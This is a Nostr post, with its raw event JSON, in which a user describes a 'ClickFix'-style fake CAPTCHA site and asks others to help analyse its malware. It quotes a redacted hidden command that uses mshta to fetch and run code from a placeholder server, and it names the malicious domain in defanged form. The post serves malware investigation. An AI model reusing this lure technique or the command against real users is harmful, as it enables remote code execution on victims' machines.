Can anybody on Nostr do malware analysis in the wild?
This website shows a fake CAPTCHA only for Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent looking verification ID into the run console which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and actually runs "mshta <malicious_server>.icu/gkcxv.google?i=<uuid>" that executes arbitrary code on the victim's machine.
The source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.
I'm trying to figure out what the stage 2 mshta payload actually does and does the site actually run something with the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command & control servers so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?
The *malicious* website:
https://gameskeys(.)net/we-were-here-forever-controls-guide
#asknostr Ava ॐ (nprofile…l3q3)
cypherhoodlum🏴☠️
npub1h0…v0cnf
2025-03-29 23:48:57
Author Public Key
npub1h00dlum44jnxdjeqms0d9s0l0n0lslv84mcw5420qpu277d8y4mqpv0cnfPublished at
2025-03-29 23:48:57Event JSON
{
"id": "f4a45b71b39d2c9a8c811cb4e2b1d9fcde8802ea2b691e2a4385d06806a7c8e5",
"pubkey": "bbdedff375aca666cb20dc1ed2c1ff7cdff87d87aef0ea554f0078af79a72576",
"created_at": 1743292137,
"kind": 1,
"tags": [
[
"p",
"4eb88310d6b4ed95c6d66a395b3d3cf559b85faec8f7691dafd405a92e055d6d",
"",
"mention"
],
[
"t",
"asknostr"
],
[
"r",
"gkcxv.google?i=\u003cuuid\u003e\""
]
],
"content": "Can anybody on Nostr do malware analysis in the wild?\n\nThis website shows a fake CAPTCHA only for Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent looking verification ID into the run console which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and actually runs \"mshta \u003cmalicious_server\u003e.icu/gkcxv.google?i=\u003cuuid\u003e\" that executes arbitrary code on the victim's machine.\n\nThe source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.\n\nI'm trying to figure out what the stage 2 mshta payload actually does and does the site actually run something with the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command \u0026 control servers so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?\n\nThe *malicious* website:\n\nhttps://gameskeys(.)net/we-were-here-forever-controls-guide\n\n#asknostr nostr:nprofile1qqsyawyrzrttfmv4cmtx5w2m85702kdct7hv3amfrkhagpdf9cz46mgprpmhxue69uhkv6tvw3jhytnwdaehgu3wwa5kuef0qyghwumn8ghj7mn0wd68ytnhd9hx2tcpydmhxue69uhkv6tvw3jhytnwdaehgu3wwa5kuef08ankcmmzv9kr6ctvds20l3q3",
"sig": "6a5cdf276747d31439ff723308117a9bbd845631f5ea7c3336d9a10babd945d736a0c98c2e7b99afa06db6be93af0765c21b6ced44bed400e57235b3b2bf12f3"
}